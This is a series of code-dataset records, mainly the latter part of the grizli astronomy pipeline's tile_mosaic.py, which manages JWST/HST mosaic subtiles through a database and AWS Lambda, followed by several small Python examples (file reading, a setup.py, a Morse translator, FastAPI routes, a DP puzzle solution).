subx, suby) subt\n    WHERE mosaic_tiles_exposures.tile = subt.tile\n    AND mosaic_tiles_exposures.subx = subt.subx\n    AND mosaic_tiles_exposures.suby = subt.suby\n    \"\"\")\n\n\ndef get_tiles_containing_point(point=(150.24727,2.04512), radius=0.01):\n    \"\"\"\n    Find subtiles and per-filter exposure counts for exposures\n    overlapping with a point\n    \"\"\"\n\n    circle = f\"circle '<({point[0]}, {point[1]}), {radius}>'\"\n\n    res = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, count(filter) as nexp\n    from mosaic_tiles_exposures ti, exposure_files e\n    where ti.expid = e.eid\n    AND polygon(e.footprint) && polygon({circle})\n    group by tile, subx, suby, filter\n    \"\"\")\n\n    return res\n\n\ndef reset_tiles_containing_point(point=(150.24727,2.04512), radius=0.01):\n    \"\"\"\n    Reset in_mosaic status for subtiles overlapping with a point\n    \"\"\"\n\n    circle = f\"circle '<({point[0]}, {point[1]}), {radius}>'\"\n\n    res = db.execute(f\"\"\"UPDATE mosaic_tiles_exposures\n    SET in_mosaic = 0\n    FROM (select tile, subx, suby\n          from mosaic_tiles_exposures ti, exposure_files e\n          where ti.expid = e.eid\n          AND polygon(e.footprint) && polygon({circle})\n          group by tile, subx, suby) subt\n    WHERE mosaic_tiles_exposures.tile = subt.tile\n    AND mosaic_tiles_exposures.subx = subt.subx\n    AND mosaic_tiles_exposures.suby = subt.suby\n    \"\"\")\n\n    return res\n\n\ndef delete_empty_exposures():\n    \"\"\"\n    Delete exposures from tiles where exptime = 0\n    \"\"\"\n    SQL = f\"\"\"SELECT tile, subx, suby, filter, in_mosaic\n    FROM mosaic_tiles_exposures t, exposure_files e\n    WHERE t.expid = e.eid\n    AND e.exptime < 1.\n    \"\"\"\n    res = db.SQL(SQL)\n\n    if len(res) > 0:\n        SQL = f\"\"\"DELETE\n        FROM mosaic_tiles_exposures t\n        USING exposure_files e\n        WHERE t.expid = e.eid\n        AND e.exptime < 1.\n        \"\"\"\n\n        db.execute(SQL)\n\n\ndef send_all_tiles():\n\n    import time\n    import os\n    import numpy as np\n    import matplotlib.pyplot as plt\n\n    import mastquery\n\n    from grizli.aws.tile_mosaic import (drizzle_tile_subregion, reset_locked,\n                                        get_lambda_client, send_event_lambda, count_locked, tile_subregion_wcs)\n    \n    
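\n    # NOTE (added comment, summarizing the code below): this driver fans out one\n    # lambda event per (tile, subx, suby, filter) subtile, throttled by\n    # count_locked() so that at most ~max_locked subtiles are marked\n    # in_mosaic=9 at once, e.g.\n    #   event = dict(tile=2530, subx=522, suby=461, filter='F160W')\n    #   send_event_lambda(event, client=client, func='grizli-mosaic-tile')\n    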
from grizli.aws import db\n from grizli import utils\n \n tiles = []\n \n client = get_lambda_client()\n \n nt0 = len(tiles)\n \n progs = f'AND tile != 1183 AND tile != 1392'\n progs = f'AND tile != 1183'\n progs = ''\n \n # Get with ra, dec\n if 0:\n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, count(subx),\n count(distinct(filter)) as nfilt\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n {progs}\n AND filter LIKE '%%CLEAR'\n GROUP BY tile, subx, suby\n ORDER BY count(subx) ASC\n \"\"\")\n \n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, count(filter), filter,\n SUM(e.exptime) as exptime\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND in_mosaic >= 0\n {progs}\n AND e.instrume in ('NIRCAM','NIRISS','MIRI')\n AND filter < 'G0'\n GROUP BY tile, subx, suby, filter\n ORDER BY count(subx) ASC\n \"\"\")\n \n tiles['ra'] = 0.\n tiles['dec'] = 0.\n tiles['footprint'] = [np.zeros((4,2))]*len(tiles)\n \n keys = np.array([f'{t} {sx} {sy}'\n for t, sx, sy in zip(tiles['tile'], tiles['subx'], tiles['suby'])])\n \n un = utils.Unique(keys, verbose=False)\n for v in tqdm(un.values):\n tile, subx, suby = np.cast[int](v.split())\n _wcs = tile_subregion_wcs(tile, subx, suby)\n ra, dec = _wcs.calc_footprint().mean(axis=0)\n tiles['ra'][un[v]] = ra\n tiles['dec'][un[v]] = dec\n tiles['footprint'][un[v]] = _wcs.calc_footprint()\n \n # Better exposure map\n point = utils.SRegion('circle(53.1, -27.8, 0.2)', wrap=False)\n filt = 'F210M-CLEAR'\n\n point = utils.SRegion('circle(3.5, -30.8, 2)', wrap=False)\n filt = 'F444W-CLEAR'\n \n coo = np.array([tiles['ra'], tiles['dec']]).T\n in_point = point.path[0].contains_points(coo)\n with_filt = in_point & (tiles['filter'] == filt)\n \n cosd = np.cos(np.median(tiles['dec'][in_point])/180*np.pi)\n \n #plt.plot(*point.xy[0].T, alpha=0.1)\n \n dx = tiles['ra'][in_point].max() - tiles['ra'][in_point].min()\n dy = tiles['dec'][in_point].max() - tiles['dec'][in_point].min()\n aspect = dy/(dx*cosd)\n \n fig, ax = plt.subplots(1,1,figsize=(5,5*aspect))\n \n ax.set_xlim(tiles['ra'][in_point].max()+0.2*dx, \n tiles['ra'][in_point].min()-0.2*dx)\n ax.set_ylim(tiles['dec'][in_point].min()-0.2*dy, \n tiles['dec'][in_point].max()+0.2*dy)\n \n ax.set_aspect(1./cosd)\n ax.grid()\n ax.set_title(filt)\n \n for f, c in zip(tiles['footprint'][with_filt], tiles['exptime'][with_filt]):\n sr = utils.SRegion(f)\n ic = np.interp(np.log10(c/3600.), [np.log10(100./3600), np.log10(20)],\n [0, 1], left=0, right=1.)\n for p in sr.get_patch(alpha=0.9, zorder=1000,\n fc=plt.cm.magma_r(ic), ec='None'):\n ax.add_patch(p)\n \n _ = mastquery.overlaps.draw_axis_labels(ax, nlabel=3)\n fig.tight_layout(pad=1.0)\n \n ### Reset EGS JWST\n if 0:\n res = db.SQL(f\"\"\"select tile, subx, suby, in_mosaic, e.filter\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.tile = 2430 AND ti.expid = e.eid\n AND e.instrume in ('NIRCAM','MIRI')\n AND e.file like 'jw01345%%'\n \"\"\")\n\n res = db.execute(f\"\"\"UPDATE mosaic_tiles_exposures\n SET in_mosaic = 0\n FROM (select tile, subx, suby, expid\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.expid = e.eid\n AND e.instrume in ('NIRCAM','MIRI')\n AND e.file like 'jw01345%%' AND e.filter in ('F115W-CLEAR')\n ) subt\n WHERE mosaic_tiles_exposures.tile = subt.tile \n AND mosaic_tiles_exposures.subx = subt.subx\n AND mosaic_tiles_exposures.suby = subt.suby \n AND mosaic_tiles_exposures.expid = subt.expid\n \"\"\")\n \n \n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, count(filter) as 
count,\n min(substr(e.file,1,7)) as file0, max(substr(e.file,1,7)) as file1\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND in_mosaic = 0\n {progs}\n AND filter < 'G0'\n GROUP BY tile, subx, suby, filter\n ORDER BY filter ASC\n \"\"\")\n \n if 1:\n \n # Skip all optical\n skip = (tiles['filter'] > 'F18') #& (tiles['count'] > 100)\n skip |= (tiles['filter'] < 'F18') & (tiles['count'] > 100)\n timeout = 60\n \n skip = (tiles['filter'] > 'F18') & (tiles['count'] > 100)\n skip |= (tiles['filter'] < 'F18') & (tiles['count'] > 300)\n timeout = 60\n \n tiles = tiles[~skip]\n else:\n # Randomize order for running locally\n ix = np.argsort(np.random.rand(len(tiles)))\n tiles = tiles[ix]\n timeout = 60\n \n nt1 = len(tiles)\n print(nt1, nt0-nt1)\n \n NMAX = len(tiles)\n\n istart = i = -1\n \n max_locked = 800\n \n step = max_locked - count_locked()[0]\n \n while i < NMAX-1:\n i+=1 \n # if tiles['tile'][i] == 1183:\n # continue\n \n if i-istart == step:\n istart = i\n print(f'\\n ############### \\n {time.ctime()}: Pause for {timeout} s / {step} run previously')\n time.sleep(timeout)\n \n step = np.maximum(max_locked - count_locked()[0], 1)\n print(f'{time.ctime()}: Run {step} more \\n ############## \\n')\n \n event = dict(tile=int(tiles['tile'][i]), \n subx=int(tiles['subx'][i]),\n suby=int(tiles['suby'][i]),\n filter=tiles['filter'][i], \n exposure_count=int(tiles['count'][i]),\n counter=i+2, \n time=time.ctime())\n \n if 1:\n send_event_lambda(event, client=client, func='grizli-redshift-fit')\n \n else:\n drizzle_tile_subregion(**event, \n s3output=None,\n ir_wcs=None, make_figure=False, \n skip_existing=True, verbose=True, \n gzip_output=False, clean_flt=False)\n \n files='tile.{tile:04d}.{subx:03d}.{suby:03d}.{fx}*fits'\n os.system('rm '+ files.format(fx=event['filter'].lower(), \n **event))\n \n # if (i+1) % 300 == 0:\n # break\n #time.sleep(10)\n\n ### Run locally\n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, MAX(in_mosaic) as in_mosaic, count(filter)\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND tile != 1183\n GROUP BY tile, subx, suby, filter\n ORDER BY (tile, filter)\n \"\"\")\n \n keep = (tiles['filter'] > 'F199') & (tiles['count'] > 100)\n utils.Unique(tiles['in_mosaic'][keep])\n \n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, count(filter)\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND in_mosaic = 0 AND tile != 1183\n GROUP BY tile, subx, suby, filter\n ORDER BY (tile, filter)\n \"\"\")\n\n skip = (tiles['filter'] > 'F1') & (tiles['count'] < 100)\n skip |= (tiles['filter'] < 'F1') & (tiles['count'] > 300)\n\n tiles = tiles[~skip]\n \n NMAX = len(tiles)\n\n istart = i = -1\n \n tile_filt = (0, 0)\n \n while i < NMAX:\n i+=1 \n if tiles['tile'][i] == 1183:\n continue\n \n event = dict(tile=int(tiles['tile'][i]), \n subx=int(tiles['subx'][i]),\n suby=int(tiles['suby'][i]),\n filter=tiles['filter'][i], \n counter=i, \n time=time.ctime())\n \n if (event['tile'], event['filter']) != tile_filt:\n print('Next filter, remove flc.fits')\n os.system('rm *flc.fits')\n tile_filt = (event['tile'], event['filter'])\n \n if 0:\n send_event_lambda(event, client=client, func='grizli-mosaic-tile')\n \n else:\n status = drizzle_tile_subregion(**event, \n s3output=None,\n ir_wcs=None, make_figure=False, \n clean_flt=False,\n skip_existing=True, verbose=True, \n gzip_output=False)\n \n files='tile.{tile:04d}.{subx:03d}.{suby:03d}.{fx}*fits'\n os.system('rm '+ 
files.format(fx=event['filter'].lower(), \n **event))\n \n \ndef get_tile_status(tile, subx, suby, filter):\n \"\"\"\n Is a tile \"locked\" with all exposures set with in_mosaic = 9?\n \"\"\"\n\n exp = db.SQL(f\"\"\"SELECT dataset, extension, assoc, filter, \n exptime, footprint, in_mosaic, detector\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n AND filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\"\"\")\n \n if len(exp) == 0:\n status = 'empty'\n elif (exp['in_mosaic'] == 9).sum() == len(exp):\n status = 'locked'\n elif (exp['in_mosaic'] == 1).sum() == len(exp):\n status = 'completed'\n else:\n status = 'go'\n \n return exp, status\n\n\ndef drizzle_tile_subregion(tile=2530, subx=522, suby=461, filter='F160W', s3output=None, ir_wcs=None, make_figure=False, skip_existing=True, verbose=True, gzip_output=False, **kwargs):\n \"\"\"\n Drizzle a subtile\n \n Parameters\n ----------\n tile, subx, suby : int\n Identifiers of subtile\n \n filter : str\n Filter bandpass\n \n s3output : str\n Output S3 path, defaults to \n ``s3://grizli-mosaic-tiles/Tiles/{tile}/``\n \n ir_wcs : `~astropy.wcs.WCS`\n Override subtile WCS\n \n skip_existing : bool\n Skip if output already exists or `in_mosaic` is 0 or 9 in the \n database\n \n gzip_output : bool\n Gzip the drizzle products\n \n kwargs : dict\n Arguments passed through to `grizli.aws.visit_processor.cutout_mosaic`\n \n Returns\n -------\n status : str\n - ``skip completed`` = `tile.subx.suby.filter` has `in_mosaic = 1` \n in database\n - ``skip locked`` = `tile.subx.suby.filter` has `in_mosaic = 9` \n in database\n - ``skip empty`` = no exposures found for `tile.subx.suby.filter`\n - ``skip local`` = `tile.subx.suby.filter` found in local directory\n - ``tile.{tile}.{subx}.{suby}.{filter}`` = rootname of created file\n \n \"\"\"\n import os\n import astropy.table\n import astropy.units as u\n import astropy.wcs as pywcs\n import astropy.io.fits as pyfits\n \n import numpy as np\n from grizli import utils\n from grizli.aws import visit_processor\n \n exp, status = get_tile_status(tile, subx, suby, filter) \n \n root = f'tile.{tile:04d}.{subx:03d}.{suby:03d}'\n \n if status in ['empty']:\n if verbose:\n print(f'{root} {filter} ! 
No exposures found')\n \n return 'skip empty'\n \n elif status in ['locked']:\n print(f'{root} {filter} tile locked')\n return 'skip locked'\n \n elif (status in ['completed']) & (skip_existing):\n print(f'{root} {filter} tile already completed')\n return 'skip completed'\n \n sci_file = f'{root}.{filter.lower()}_drz_sci.fits'\n if skip_existing & os.path.exists(sci_file):\n print(f'Skip file {sci_file}')\n return 'skip local'\n \n # Lock\n db.execute(f\"\"\"UPDATE mosaic_tiles_exposures t\n SET in_mosaic = 9\n FROM exposure_files w\n WHERE t.expid = w.eid\n AND w.filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\"\"\")\n \n if ir_wcs is None:\n ir_wcs = tile_subregion_wcs(tile, subx, suby)\n \n if verbose:\n print(f'{root} {filter} {len(exp)}')\n \n if s3output is None:\n s3output = f's3://grizli-mosaic-tiles/Tiles/{tile}/'\n \n try:\n visit_processor.cutout_mosaic(rootname=root,\n product='{rootname}.{f}',\n ir_wcs=ir_wcs,\n res=exp, \n s3output=s3output, \n make_figure=make_figure,\n skip_existing=skip_existing,\n gzip_output=gzip_output,\n **kwargs)\n \n # Update subtile status\n db.execute(f\"\"\"UPDATE mosaic_tiles_exposures t\n SET in_mosaic = 1\n FROM exposure_files w\n WHERE t.expid = w.eid\n AND w.filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\n \"\"\")\n except TypeError:\n db.execute(f\"\"\"UPDATE mosaic_tiles_exposures t\n SET in_mosaic = 8\n FROM exposure_files w\n WHERE t.expid = w.eid\n AND w.filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\n \"\"\")\n \n status = '{root}.{f}'\n return status\n\n\ndef query_cutout(output='mos-{tile}-{filter}_{drz}', ra=189.0243001, dec=62.1966953, size=10, filters=['F160W'], theta=0, make_figure=False, make_mosaics=False, all_tiles=True, **kwargs):\n \"\"\"\n \"\"\"\n from tqdm import tqdm\n import matplotlib.pyplot as plt\n from grizli import utils\n from grizli.aws import tile_mosaic, db\n \n cosd = np.cos(dec/180*np.pi)\n rc = size/3600*np.sqrt(2)\n rtile = np.sqrt(2)*128*PIXEL_SCALE/3600\n \n SQL = f\"\"\"SELECT tile, subx, suby, subra, subdec, filter\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE in_mosaic = 1\n AND t.expid = e.eid \n AND ('((' || (subra - {ra})*{cosd} || \n ', ' || subdec - {dec} || '),\n {rtile})')::circle\n && ('((0,0),{rc})')::circle\n GROUP BY tile, subx, suby, subra, subdec, filter\"\"\"\n \n res = db.SQL(SQL) \n if len(res) == 0:\n msg = f'Nothing found for ({ra:.6f}, {dec:.6f}, {size}\")'\n return 'empty nothing found', None\n \n if filters is None:\n filters = np.unique(res['filter']).tolist()\n else:\n keep = utils.column_values_in_list(res['filter'], filters)\n res = res[keep]\n \n if len(res) == 0:\n msg = f'Nothing found for ({ra:.6f}, {dec:.6f}, {size}\") {filters}'\n return 'empty filter', None\n \n if make_figure:\n fig, ax = plt.subplots(1,1,figsize=(8,8))\n ax.scatter(res['subra'], res['subdec'], marker='x', alpha=0.)\n \n oh, ow = utils.make_wcsheader(ra=ra, dec=dec, size=size*2, \n pixscale=PIXEL_SCALE,\n theta=theta)\n \n sh = utils.SRegion(ow)\n shu = sh.union().shapely\n \n if make_figure:\n ax.add_patch(sh.get_patch(alpha=0.2, color='r')[0])\n \n res['keep'] = False\n \n iters = zip(res['tile'], res['subx'], res['suby'])\n \n keys = [res['tile'][i]*1e6+res['subx'][i]*1000+res['suby'][i]\n for i in range(len(res))]\n \n un = utils.Unique(keys, verbose=False) \n for k in un.values:\n unk = un[k]\n rk = res[unk][0]\n tw = tile_subregion_wcs(rk['tile'], rk['subx'], rk['suby'])\n sr = utils.SRegion(tw)\n isect = 
sr.shapely[0].intersects(shu)\n        res['keep'][unk] = isect\n\n        if make_figure:\n            if isect:\n                ec = 'b'\n                fc = 'b'\n                alpha=0.2\n            else:\n                ec = '0.8'\n                fc = 'None'\n                alpha=0.3\n\n            ax.add_patch(sr.get_patch(alpha=alpha, fc=fc, ec=ec, zorder=-10)[0])\n\n    if res['keep'].sum() == 0:\n        msg = f'Nothing found for ({ra:.6f}, {dec:.6f}, {size}\") {filters}'\n        return 'empty filter', None\n\n    res = res[res['keep']]\n\n    if make_mosaics:\n        make_mosaic_from_table(res, output=output, all_tiles=all_tiles,\n                               **kwargs)\n\n    return 'ok', res\n\n\ndef make_mosaic_from_table(tab, output='mos-{tile}-{filter}_{drz}', clean_subtiles=False, send_to_s3=False, all_tiles=True, **kwargs):\n    \"\"\"\n    \"\"\"\n    from grizli import utils\n    un = utils.Unique(tab['tile'], verbose=False)\n    if all_tiles:\n        tiles = un.values\n    else:\n        tiles = [un.values[np.argmin(un.count)]]\n\n    for t in tiles:\n\n        unt = tab[un[t]]\n\n        xmi = unt['subx'].min()\n        ymi = unt['suby'].min()\n        xma = unt['subx'].max()\n        yma = unt['suby'].max()\n\n        filts = [f.lower() for f in np.unique(unt['filter'])]\n\n        ll = (xmi, ymi)\n        ur = (xma, yma)\n\n        for filt in filts:\n            build_mosaic_from_subregions(root=output,\n                                         tile=t, files=None, filter=filt,\n                                         ll=ll, ur=ur,\n                                         clean_subtiles=clean_subtiles,\n                                         send_to_s3=send_to_s3)\n\n        if 0:\n            from grizli.pipeline import auto_script\n            ds9 = None\n            auto_script.field_rgb(root=f'mos-{t}', HOME_PATH=None, scl=1, ds9=ds9)\n\n\ndef build_mosaic_from_subregions(root='mos-{tile}-{filter}_{drz}', tile=2530, files=None, filter='f140w', ll=None, ur=None, clean_subtiles=False, send_to_s3=False, make_weight=True):\n    \"\"\"\n    Build a mosaic by pasting drizzled subtile cutouts into a single image\n    \"\"\"\n    import os\n    from tqdm import tqdm\n    import glob\n    import numpy as np\n    import astropy.io.fits as pyfits\n    import astropy.wcs as pywcs\n    from grizli import utils\n\n    if 0:\n        for filt in ['f105w','f140w','f160w']:\n            build_mosaic_from_subregions(tile=2530, files=None, filter=filt)\n\n    #tile = 2530\n    #filter = 'f140w'\n\n    if files is None:\n        files = glob.glob(f'tile.{tile:04d}.*_dr?_sci.fits')\n        files.sort()\n\n    if len(files) > 0:\n        tx = np.array([int(f.split('.')[2]) for f in files])\n        ty = np.array([int(f.split('.')[3]) for f in files])\n\n        txm, tym = tx.min(), ty.min()\n\n        if ll is None:\n            ll = [txm, tym]\n\n        if ur is None:\n            ur = [tx.max(), ty.max()]\n\n    nx = ur[0] - ll[0] + 1\n    ny = ur[1] - ll[1] + 1\n\n    llw = tile_subregion_wcs(tile, ll[0], ll[1])\n\n    MIRI_FILTERS = ['f560w','f770w','f1000w','f1280W',\n                    'f1500w','f1800w', 'f2100w','f2550w']\n\n    if ('clear' in filter):\n        npix = 512\n        llw = utils.half_pixel_scale(llw)\n        drz = 'drc'\n    elif (filter in MIRI_FILTERS):\n        npix = 256\n        drz = 'drz'\n    elif (filter > 'f199') & (filter not in ['g102','g141']):\n        npix = 512\n        llw = utils.half_pixel_scale(llw)\n        drz = 'drc'\n    else:\n        npix = 256\n        drz = 'drz'\n\n    img = np.zeros((ny*npix, nx*npix), dtype=np.float32)\n    if make_weight:\n        imgw = np.zeros_like(img)\n\n    llh = utils.to_header(llw)\n    llh['NAXIS1'] = nx*npix\n    llh['NAXIS2'] = ny*npix\n    llh['FILTER'] = filter.upper()\n\n    ###### and check difference between opt / ir\n    ###### and change drizzle params!\n\n    exposures = []\n\n    llh['EXPSTART'] = 1e10\n    llh['EXPEND'] = 0\n\n    im = None\n\n    for xi in range(ll[0], ur[0]+1):\n        for yi in range(ll[1], ur[1]+1):\n            file = f'tile.{tile:04d}.{xi:03d}.{yi:03d}'\n            file += f'.{filter}_{drz}_sci.fits'\n\n            s3 = f's3://grizli-mosaic-tiles/Tiles/{tile}/'\n            db.download_s3_file(s3+file, overwrite=False, verbose=False)\n\n            if not os.path.exists(file):\n                #print('Skip', file)\n                continue\n\n            print(file)\n            
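\n            # (added comment) Paste this subtile into the output mosaic at its\n            # block offset relative to the lower-left subtile: (xi-ll[0], yi-ll[1]).\n            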
im = pyfits.open(file)\n\n            if llh['EXPSTART'] > im[0].header['EXPSTART']:\n                llh['EXPSTART'] = im[0].header['EXPSTART']\n\n            if llh['EXPEND'] < im[0].header['EXPEND']:\n                llh['EXPEND'] = im[0].header['EXPEND']\n\n            for j in range(im[0].header['NDRIZIM']):\n                exp = im[0].header[f'FLT{j+1:05d}']\n                if exp not in exposures:\n                    exposures.append(exp)\n\n            slx = slice((xi-ll[0])*npix, (xi-ll[0]+1)*npix)\n            sly = slice((yi-ll[1])*npix, (yi-ll[1]+1)*npix)\n            img[sly, slx] += im[0].data\n\n            if make_weight:\n                wfile = file.replace('_sci','_wht')\n                db.download_s3_file(s3+wfile, overwrite=False, verbose=False)\n                if os.path.exists(wfile):\n                    imw = pyfits.open(wfile)\n                    imgw[sly, slx] += imw[0].data\n                else:\n                    wfile = None\n\n            if clean_subtiles:\n                os.remove(file)\n                if wfile is not None:\n                    os.remove(wfile)\n\n    llh['NDRIZIM'] = len(exposures)\n    for j, exp in enumerate(exposures):\n        llh[f'FLT{j+1:05d}'] = exp\n\n    if im is not None:\n        for k in im[0].header:\n            if (k not in llh) & (k not in ['SIMPLE','BITPIX','DATE-OBS','TIME-OBS']):\n                llh[k] = im[0].header[k]\n                #print(k, im[0].header[k])\n\n    # Empty\n    if 'PHOTFLAM' not in llh:\n        llh['PHOTFLAM'] = 0.\n        llh['PHOTFNU'] = 0.\n        llh['PHOTPLAM'] = 1.\n\n    outfile = root.format(tile=tile, filter=filter, drz=drz) + '_sci.fits'\n    pyfits.writeto(outfile, data=img,\n                   header=llh, overwrite=True)\n\n    if make_weight:\n        wfile = root.format(tile=tile, filter=filter, drz=drz) + '_wht.fits'\n        pyfits.writeto(wfile, data=imgw, header=llh, overwrite=True)\n    else:\n        wfile = None\n\n    if send_to_s3:\n        db.upload_file(outfile, 'grizli-v2', object_name='Scratch/'+outfile)\n        if make_weight:\n            db.upload_file(wfile, 'grizli-v2', object_name='Scratch/'+wfile)\n\n    return outfile, wfile\n\n    #os.system(f'aws s3 cp {root}.{tile:04d}-{filter}_drz_sci.fits s3://grizli-v2/Scratch/')\n\n\n","repo_name":"gbrammer/grizli","sub_path":"grizli/aws/tile_mosaic.py","file_name":"tile_mosaic.py","file_ext":"py","file_size_in_byte":56360,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"35"} +{"seq_id":"36256541688","text":"#created with: PyCharm\r\n#Author:Wilson\r\n#Date:2018/5/18\r\n#Time:12:14\r\n\r\n# readline()\r\nwith open(\"poem.txt\",\"r\",encoding=\"utf-8\") as f:\r\n    # reads only a single line\r\n    line = f.readline()\r\n    print(line)\r\n\r\n    # read out all remaining lines with a while loop\r\n    while True:\r\n        line = f.readline()\r\n        if not line:\r\n            break\r\n        print(line,end=\"\") #end=\"\" keeps print from adding its own newline; delete end=\"\" to see the difference","repo_name":"gains21cn/Python_study","sub_path":"文件操作/readline读取.py","file_name":"readline读取.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33165086087","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\nimport re\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(\n    name='CertCenter',\n    description='The official CertCenter API library',\n    long_description=long_description,\n    version=re.search('^__version__\\s*=\\s*\"(.*)\"', open('CertCenter.py').read(), re.M).group(1),\n    url='https://github.com/CertCenter/pyCertCenter',\n    author='CertCenter Development Team',\n    author_email='pyCertCenter-dev@certcenter.com',\n    license='MIT',\n    classifiers=[\n        'Development Status :: 4 - Beta',\n\t\t'Environment :: Plugins',\n\t\t'Intended Audience :: Developers',\n        'Topic :: Security :: Cryptography',\n\t\t'License :: OSI Approved :: MIT License',
\n\t\t'Operating System :: OS Independent',\n\t\t'Programming Language :: Python',\n\t\t'Topic :: Software Development :: Libraries'\n\n    ],\n    keywords='SSL TLS Encryption Certificates CertCenter Sockets',\n    py_modules=[\"CertCenter\"]\n)\n","repo_name":"CertCenter/pyCertCenter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"7918981511","text":"# Dictionary representing the morse code chart\nMORSE_CODE_DICT = {\n    'A': '.-', 'B': '-...', 'C': '-.-.',\n    'D': '-..', 'E': '.', 'F': '..-.',\n    'G': '--.', 'H': '....', 'I': '..',\n    'J': '.---', 'K': '-.-', 'L': '.-..',\n    'M': '--', 'N': '-.', 'O': '---',\n    'P': '.--.', 'Q': '--.-', 'R': '.-.',\n    'S': '...', 'T': '-', 'U': '..-',\n    'V': '...-', 'W': '.--', 'X': '-..-',\n    'Y': '-.--', 'Z': '--..',\n\n    '0': '-----', '1': '.----', '2': '..---',\n    '3': '...--', '4': '....-', '5': '.....',\n    '6': '-....', '7': '--...', '8': '---..',\n    '9': '----.',\n\n    ', ': '--..--', '.': '.-.-.-', '?': '..--..',\n    '/': '-..-.', '-': '-....-', '(': '-.--.', ')': '-.--.-'\n    }\n\nENGLISH_TO_MORSE = {value: key for key, value in MORSE_CODE_DICT.items()}\n\n\ndef morse_code(encryption):\n    return ' '.join(MORSE_CODE_DICT.get(char.upper()) for char in encryption)\n\n\ndef english_code(decryption):\n    if decryption in ENGLISH_TO_MORSE.keys():\n        return ''.join(ENGLISH_TO_MORSE.get(char) for char in decryption.split())\n    else:\n        return False\n\n\ndef message():\n    while True:\n        word = input(\"Type 'E' to encrypt morse code message or 'M' to decrypt morse code message: \").upper()\n        if not (word == 'E' or word == 'M'):\n            print(\"Invalid command!\\n\")\n            continue\n        else:\n            break\n\n    if word == 'E':\n        word = input(\"Type your message in English: \")\n        print(morse_code(word))\n\n    elif word == 'M':\n        while True:\n            word = input(\"Type your message in morse code: \")\n            phrase = english_code(word)\n            if not phrase:\n                phrase = 'M'\n                print(\"Invalid Command!\\n\")\n\n            else:\n                print(phrase)\n                break\n\n\nmessage()\n","repo_name":"jNembhard/MorseCode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41997206156","text":"from enum import Enum\n\nfrom fastapi import FastAPI\n\n\nclass ModelName(str, Enum):\n    alexnet = \"alexnet\"\n    resnet = \"resnet\"\n    lenet = \"lenet\"\n\n\napp = FastAPI()\n\n\n@app.get(\"/models/{model_name}\")\nasync def get_model(model_name: ModelName):\n    if model_name == ModelName.alexnet:\n        return {\"model_name\": model_name, \"message\": \"Deep Learning FTW!\"}\n    if model_name.value == \"lenet\":\n        return {\"model_name\": model_name, \"message\": \"LeCNN all the images\"}\n    return {\"model_name\": model_name, \"message\": \"Have some residuals\"}\n\n\n@app.get(\"/\")\nasync def root():\n    return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/items/{item_id}\")\nasync def read_item(item_id: int):\n    return {\"item_id\": item_id}\n","repo_name":"tsyganno/first_project_fastapi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42073669292","text":"# Sum decomposition (https://www.acmicpc.net/problem/2225)\n'''\nFirst impression: it felt like it could be solved with DP.. but it was only a feeling....
\nlol, I was surprised the editorial took such a mathematical approach..\n\nFor any k, when n is 1 the number of cases is k\n > e.g. if k=4, n=1: (0,0,0,1), (0,0,1,0), (0,1,0,0), (1,0,0,0) - 4 in total\n\nIf k = 1, there is 1 case regardless of n\n\nIf k = 2, there are n+1 cases\n'''\n\nn, k = map(int,input().split())\ngraph = [[0]*201 for _ in range(201)]\n\nfor i in range(201):\n    graph[1][i] = 1\n    graph[2][i] = i+1\n\nfor i in range(2,201):\n    graph[i][1] = i\n    for j in range(2,201):\n        graph[i][j] = (graph[i-1][j] + graph[i][j-1]) % 1000000000\n\nprint(graph[k][n])\n","repo_name":"apple2062/algorithm","sub_path":"study/week10/합분해(2225).py","file_name":"합분해(2225).py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19214025082","text":"name = \"Devin\"\r\nSubject = \"Treehouse loves {}\".format(name)\r\n\r\n\"\"\" Methods for changing lists \"\"\"\r\n\r\nmy_list = [1,2,3,4,5,6,7,8,9,10]\r\nmy_list.append(11)\r\nprint(my_list)\r\n\r\nmy_list = [1,2,3]\r\nmy_list.extend([4,5,6])\r\nprint(my_list)\r\n\r\nmy_list.remove(5)\r\nprint(my_list)\r\n\r\nlist('hello')\r\nprint(list)\r\n\r\n\"\"\" Turning a list() into a String \"\"\"\r\nflavors = ['chocolate', 'mint','strawberry']\r\nprint(','.join(flavors))\r\n\r\nprint(\"My favorite flavors are: {}\".format(\", 